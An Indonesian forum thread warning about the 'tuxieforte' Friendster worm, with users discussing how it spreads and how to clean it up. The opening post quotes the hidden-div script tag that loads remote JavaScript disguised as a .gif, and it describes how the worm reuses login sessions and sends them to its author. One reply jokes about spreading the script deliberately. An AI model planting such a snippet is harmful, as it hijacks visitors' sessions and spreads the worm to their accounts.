• Saat ini anda mengakses IndoForum sebagai tamu dimana anda tidak mempunyai akses penuh untuk melihat artikel dan diskusi yang hanya diperuntukkan bagi anggota IndoForum. Dengan bergabung maka anda akan memiliki akses penuh untuk melakukan tanya-jawab, mengirim pesan teks, mengikuti polling dan menggunakan feature-feature lainnya. Proses registrasi sangatlah cepat, mudah dan gratis.
    Silahkan daftar dan validasi email anda untuk dapat mengakses forum ini sepenuhnya sebagai anggota. Harap masukkan alamat email yang benar dan cek email anda setelah daftar untuk validasi.

[Info] Hati2, ada Virus baru di FS

  • Pembuat thread awal. Pembuat thread awal. sone
  • Tanggal Mulai Tanggal Mulai

sone

IndoForum Junior A
No. Urut
354
Sejak
8 Apr 2006
Pesan
3.404
Nilai reaksi
155
Poin
63
Virus baru di FS...
sori klo repost...
anjrit... barusan gw kena...
malu-maluin aja... bisa2nya gw kena...

caranya lumayan halus...
kl org awam pasti ga ngerasa...
untung aja gw paranoid...

bisa2nya nge-inject fs gw pake vires...

silahken di selidiki sendiri

codenya diembed di media box ky gini:
Kode:
<div id="tuxieforte" style="display:none"><script id='ix' type='text/javascript' src='http://usera.imagecave.com/images-627xL/slide/OG_Slide.gif'></script></div>
pada senang kalian dpt maenan baru*


update (CMIIW...)
karena byk yg tanya coba tak jelasin scr singkat cara kerjannya virus2 FS...
user yg terinfeksi, misal si A, di MediaBox nya ada kode virusnya...
si pengunjung (misal B) membuka fs si A, ketika terbuka, script yg ada lsg jalan...
karena status si B dlm keadaan Login di fs dia, maka si virus memanfaatkan LoginSession si B untuk -- secara diam2 -- 'meng-update' profil si B (nambah kode virus di MediaBox si B)...
maka sejak saat itu, siapapun, yg dalam keadaan login, akan ikut ketularan kl membuka profil si B...

note: selain menginfeksi FS, si virus juga ngirim LoginSession ke alamat milik si pembuat virus....
saran: kl ketularan, stl dibersihkan segera logout baru login lagi...
logout supaya LoginSesion kalian expired...


kira2 begitu...
OK
 
wah tq de....
Harus hati2 nih

Saya Turut berduka cita pada sone karena tlah terkena virus :D
 
tanya
cara tau kalo fs kita tuh udah ketularan gmn ya?
cara bersihinnya gimana?
dan dampaknya buat kita atau fs kita apa ya?
thx before
 
Wek
Ngeliat session di PHP tuh ga mudah logh....
tandanya tuh hacker uda tau banget seluk beluk FS



kalo ini bukan Hoax,
tandanya FS kena SQL Injection dong...
~_~
 
ya pokoknya kalo didalam FS nya terdapat byk link yg kira2 mencurigakan ya jgn sembarangan di klik donk

apalagi org tersebut baru kita kenal
 
gw virus ato apa ya?
gw buka my profile langsung ke personalize url...
bgitu trus ampe 2 hari...
gw edit profile edit edit ke customize media box(kebetulan mau ganti lagu)
gw hapus baru kemarin tuh
eh langsung bisa buka profil...

error/bug/virus?
 
waduh serem juga tuh /swt untung du FS gue ga ada yg aneh2
 
klau digituin emg fs-nya jadi kek gimana ?
klau punya gw kmrn itu.. profile nya ilang semua.. kosong gitu..
bagian 'hobby and interest' itu kek ada gambar apaan gitu,,
tapi kgk kliatan gambarnya.. /swt
dr umur sampek location nya itu berubah semua /sob
itu knapa ?
 
ini namanay bug deh bkn virus... hmmm masa script kyk gitu d blg viruz
 
wohh baru tau kalo ada ini...

cek dolo ahh...
 
wedew ... ini kan overlay layout ...
bukan virus tu,yg namanya virus itu sanggup memultiplikasi diirnya secara otomatis.
bisa dikategorikan defacing ini
 
semoga aja di signaturenya indoforum ga memfasilitasi script java itu.....
haha....
kemungkinan ada yg iseng naro sciptnya di signature.....
kan sapa tau...

tapi gw ga tau itu script html ato java....

tapi kalo gw bilang...mending abis di bersihin ganti password aja....
 
worms tuxieforte nyerang FS yg punya Inject CSS, JS, dan overlay...
klo di media box cuman kode embed doank isinya mah ga bakalan knp2 cuman sekarang FS updatenya gila.. naro kode embed ajah dah ga bisa..
 
sebagai tambahan
nama worm ny adalah TUXIEFORTE
TUXIEFORTE itu adalah virus yang masuk ke dalam kolom Media Box kita. Fungsi virus tsb adalah mendisable (menonaktifkan) semua script injector yang kita pakai di FS kita. FS kita itu bisa dipercantik dengan script. Ada CSS dan JS (Java Script) tapi sebelumnya kita harus upload dulu script tersebut ke situs script hosting (misal www.ripway.com atau www.freewebtown.com). Nah nanti URL dari script2 tersebut baru kita masukkan ke dalah FS menggunakan CSS dan JS extension injector :-) Asal virus tsb sekarang ini belum ada yg tahu. Ada yg bilang dari para pesaing FS, dari FS nya sendiri, atau bahkan dari FS usernya sendiri. Who knows :-)
 
=)) sone kena virus FS...
Son masa u punya fs sih? pasti isinya Boboho anakmu kan hehehe...

Ngewtawain sone ah.... (mungkin jg gw sudah kena uy) mungkin...mungkin...mungkin
 
wah bos punya gw uda kena....tp pake script yg om pake gw kasi ke org2(biar kena virus)wkwkwkwk.... FS gw di view profile gk ada wallpaper.... tp pas org yg view profile kita ada wall paper nya...gimana neh om uda ampir 1 taon FS gw kyk gtu..
 
 URL Pendek:

| JAKARTA | BANDUNG | PEKANBARU | SURABAYA | SEMARANG |

Back
Atas.